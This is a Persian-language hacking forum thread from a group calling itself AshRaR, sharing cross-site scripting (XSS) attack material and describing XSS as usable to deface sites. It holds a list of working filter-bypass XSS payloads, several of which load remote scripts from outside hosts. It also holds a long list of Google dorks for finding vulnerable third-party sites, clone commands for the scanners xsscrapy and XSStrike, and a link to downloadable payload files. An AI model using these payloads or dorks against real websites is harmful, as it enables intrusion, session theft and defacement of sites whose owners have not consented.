eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t چنل قدیم : AshRaROffical پیوی : ebli3shar توییتر : ShayanAkbari8 دست بالای دست بسیار است، اما قدرت در دستان ماست.
|
|
سه شنبه 24 مهر 1397 - 03:16 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
|
سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
|
سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
|
سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
|
سه شنبه 24 مهر 1397 - 03:23 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
پاسخ : 6 RE انواع بایپس های باگ XSS
و این هم کامل ترین و بزرگترین لیست از بایپس های این باگ که شخصا جمع اوری کردم و نوشتم
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t چنل قدیم : AshRaROffical پیوی : ebli3shar توییتر : ShayanAkbari8 دست بالای دست بسیار است، اما قدرت در دستان ماست.
|
|
سه شنبه 24 مهر 1397 - 03:25 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
پاسخ : 7 RE انواع بایپس های باگ XSS
کد:
Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t چنل قدیم : AshRaROffical پیوی : ebli3shar توییتر : ShayanAkbari8 دست بالای دست بسیار است، اما قدرت در دستان ماست.
|
|
سه شنبه 24 مهر 1397 - 05:01 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
پاسخ : 8 RE انواع بایپس های باگ XSS
یک ابزار عالی پایتون برای تست نفوذ سایت با باگ xss
git clone https://github.com/DanMcInerney/xsscrapy.git
cd xsscrapy
./xsscrapy.py -u http://example.com
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t چنل قدیم : AshRaROffical پیوی : ebli3shar توییتر : ShayanAkbari8 دست بالای دست بسیار است، اما قدرت در دستان ماست.
|
|
سه شنبه 24 مهر 1397 - 05:04 |
|
blackwolf_iran

ارسالها : 52
عضویت: 19 /7 /1397
تشکرها : 316
تشکر شده : 271
|
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی
این هم یک لیست خوب از پیلود های این باگ
امضای کاربر : باید ادامه داد مثل چریک پیر شاهین نجفی
|
|
سه شنبه 24 مهر 1397 - 05:10 |
|
blackwolf_iran

ارسالها : 52
عضویت: 19 /7 /1397
تشکرها : 316
تشکر شده : 271
|
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر
کد:
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
امضای کاربر : باید ادامه داد مثل چریک پیر شاهین نجفی
|
|
سه شنبه 24 مهر 1397 - 05:11 |
|
darkshadow

ارسالها : 173
عضویت: 8 /6 /1397
محل زندگی: California LA
تشکرها : 400
تشکر شده : 644
|
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت
کد:
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:/pages/match_report.php?mid= pages/match_report.php?mid=
امضای کاربر : کتگوری های انجمن
اخرین تاپیک های انجمن
کتگوری هکینگ
دوست داشتنی ترین چیزها اگر تو را ضعیف کنند، خطرناک ترین چیزهایند. شاهین نجفی
|
|
سه شنبه 24 مهر 1397 - 08:11 |
|
virus32

ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
|
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...
|
|
یکشنبه 06 آبان 1397 - 05:00 |
|
virus32

ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
|
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss
دانلود :
|
|
یکشنبه 06 آبان 1397 - 05:37 |
|
demon

ارسالها : 84
عضویت: 17 /2 /1397
سن: 22
تشکرها : 386
تشکر شده : 361
|
|
پنجشنبه 01 آذر 1397 - 20:10 |
|
demon

ارسالها : 84
عضویت: 17 /2 /1397
سن: 22
تشکرها : 386
تشکر شده : 361
|
|
دوشنبه 22 مهر 1398 - 02:52 |
|
demon

ارسالها : 84
عضویت: 17 /2 /1397
سن: 22
تشکرها : 386
تشکر شده : 361
|
پاسخ : 16 RE هک سایت باگ xss
ابزار XSStrike انواع حملات باگ xss
Suggest a feature Report a bug Fix something and open a pull request Create a browser extension Create a burp suite/zaproxy plugin Help me document the code Spread the word
git clone https://github.com/s0md3v/XSStrike.git
امضای کاربر : اشرار پایدار
Ali Mrd
Twitter : twitter.com/Mokh4lef
AshRaR.Info
shahinnajafi.ashrar.info
|
|
دوشنبه 22 مهر 1398 - 02:56 |
|
eblisshar

ارسالها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
|
پاسخ : 18 RE اموزش کامل باگ xss
13 فایل حاوی پیلود و بای پس های جدید و قوی باگ
دانلود :
https://drive.google.com/drive/folders/1e8h13qHnlEsj-8iutyRoOvqHSR46wFLz?usp=sharing
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t چنل قدیم : AshRaROffical پیوی : ebli3shar توییتر : ShayanAkbari8 دست بالای دست بسیار است، اما قدرت در دستان ماست.
|
|
سه شنبه 22 مهر 1399 - 01:10 |
|